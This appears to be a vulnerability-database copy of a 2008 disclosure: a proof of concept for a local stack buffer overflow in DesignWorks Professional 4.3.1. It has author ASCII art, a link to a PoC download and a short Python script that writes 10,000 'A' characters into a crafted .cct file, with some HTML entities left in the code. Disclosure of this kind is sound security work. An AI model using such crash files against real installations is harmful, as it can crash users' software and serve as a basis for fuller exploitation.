Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20968
HistoryDec 10, 2008 - 12:00 a.m.

DesignWorks Professional 4.3.1 Local .CCT File Stack Buffer Overflow (PoC)

2008-12-1000:00:00
vulners.com
14

DesignWorks Professional 4.3.1 Local .CCT File Stack Buffer Overflow (PoC)

Vive L'Algerie . . . /Cn4phux.

PoC : http://www.zshare.net/download/52308289a25b9dc8/

I'm Cn4phux

------ | ______ _____ (–, * ______

|____| | ¤ | | | | ! ) | | |

[ | |` | | <> | |-----> |__/ | | ¤ | ]

| … | |! || |____ |\ | |-----|

| _| \ ----- | ::: |

| | \

|_____| | \

|

|

,|.

/ | \

| | |

| _ |

`.\/.\/,'

( 8 )

/ '_ _' \

| /{_}\ |

` | " | `

| |

[+] Application : DesignWorks Professional 4.3.1

[+] Application's Description : (" DesignWorks Professional Schematic

Capture for Windows…,Google-it.)

[+] Bug : Local .CCT File Stack Buffer Overflow

(PoC)

[+] Author : Cn4phux

import sys
import os
print "[x] Local Stack Overflow PoC"
try:
milef = open("x2.cct",'w')

except IOError, e:
print "Unable to open file ", e
sys.exit(0)
print "[x] File sucessfully opened for writing."
try:
milef.write("A" * 10000)
except IOError, e:

print &quot;Unable to write to file &quot;, e
sys.exit&#40;0&#41;

print "[x] Exploit successfully written."
milef.close()
print "[x] ."
print "\n[x] Cn4phux made in DZ, Great'z to all Algerians. /Google.dz"